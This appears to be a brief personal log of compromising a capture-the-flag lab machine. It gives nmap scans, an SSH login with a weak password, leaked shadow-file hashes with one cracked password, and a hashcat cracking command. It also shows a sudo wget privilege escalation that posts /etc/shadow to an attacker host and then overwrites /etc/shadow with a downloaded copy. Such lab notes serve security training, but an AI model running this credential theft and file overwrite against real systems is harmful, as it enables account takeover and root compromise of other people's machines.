nmap  -p- 10.129.103.221 --max-retries 0 > nmapall.txt
nmap -sV -sC -p 79,111,22022,47224 10.129.103.13 > nmap4port.txt


用戶：
sunny sunday
sammy
ssh sunny@10.129.103.221 -p 22022 -oKexAlgorithms=+diffie-hellman-group1-sha1

sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::cooldude!
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::


hashcat -m 7400 hash.txt /usr/share/wordlists/rockyou.txt

sudo /usr/bin/wget --post-file=/etc/shadow 10.10.14.26
root:$5$WVmHMduo$nI.KTRbAaUv1ZgzaGiHhpA2RNdoo3aMDgPBL25FZcoD:14146::::::


sudo /usr/bin/wget  10.10.14.26:9999/shadow -O /etc/shadow